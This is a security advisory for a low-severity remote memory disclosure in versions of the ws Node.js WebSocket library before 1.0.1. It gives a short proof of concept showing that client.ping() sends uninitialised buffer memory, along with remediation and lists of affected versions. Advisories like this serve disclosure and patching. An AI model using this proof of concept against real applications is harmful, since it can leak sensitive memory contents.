ws

Remote Memory Disclosure

Severity: low

Overview

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Remediation

Update to version 1.0.1 or greater.

Vulnerable versions

0.2.6
7 years ago
0.2.7
7 years ago
0.2.8
7 years ago
0.2.9
7 years ago
0.3.0
7 years ago
0.3.1
7 years ago
0.3.2
7 years ago
0.3.3
7 years ago
0.3.4
7 years ago
0.3.5
7 years ago
0.3.6
7 years ago
0.3.7
7 years ago
0.3.8
7 years ago
0.3.9
7 years ago
0.4.0
7 years ago
0.4.1
7 years ago
0.4.2
7 years ago
0.4.3
7 years ago
0.4.4
7 years ago
0.4.5
7 years ago
0.4.6
7 years ago
0.4.7
6 years ago
0.4.8
6 years ago
0.4.9
6 years ago
0.4.10
6 years ago
0.4.11
6 years ago
0.4.12
6 years ago
0.4.13
6 years ago
0.4.14
6 years ago
0.4.15
6 years ago
0.4.16
6 years ago
0.4.17
6 years ago
0.4.18
6 years ago
0.4.19
6 years ago
0.4.20
6 years ago
0.4.21
6 years ago
0.4.22
6 years ago
0.4.23
6 years ago
0.4.24
6 years ago
0.4.25
6 years ago
0.4.27
5 years ago
0.4.28
5 years ago
0.4.29
5 years ago
0.4.30
5 years ago
0.4.31
5 years ago
0.4.32
4 years ago
0.5.0
4 years ago
0.6.0
4 years ago
0.6.1
4 years ago
0.6.2
4 years ago
0.6.3
4 years ago
0.6.4
4 years ago
0.6.5
4 years ago
0.7.0
4 years ago
0.7.1
4 years ago
0.7.2
3 years ago
0.8.0
3 years ago
0.8.1
3 years ago
1.0.0
3 years ago

Unaffected versions

0.3.4-2
7 years ago
0.3.5-2
7 years ago
0.3.5-3
7 years ago
0.3.5-4
7 years ago
1.0.1
3 years ago
1.1.0
2 years ago
1.1.1
2 years ago
2.0.0-beta.0
2 years ago
2.0.0-beta.1
2 years ago
2.0.0-beta.2
2 years ago
2.0.0
2 years ago
2.0.1
2 years ago
2.0.2
2 years ago
2.0.3
2 years ago
1.1.2
2 years ago
2.1.0
a year ago
2.2.0
a year ago
1.1.3
a year ago
1.1.4
a year ago
2.2.1
a year ago
2.2.2
a year ago
2.2.3
a year ago
2.3.0
a year ago
2.3.1
a year ago
3.0.0
a year ago
3.1.0
a year ago
3.2.0
a year ago
3.3.0
9 months ago
1.1.5
9 months ago
3.3.1
9 months ago
3.3.2
9 months ago
3.3.3
8 months ago
4.0.0
7 months ago
4.1.0
6 months ago
5.0.0
5 months ago
5.1.0
5 months ago
5.1.1
4 months ago
5.2.0
3 months ago
5.2.1
2 months ago
5.2.2
a month ago
6.0.0
25 days ago

Advisory timeline

  1. Published

    Advisory published
    Jan 4th, 2016
  2. Reported

    Initial report by Feross Aboukhadijeh / Mathias Buss
    Jan 4th, 2016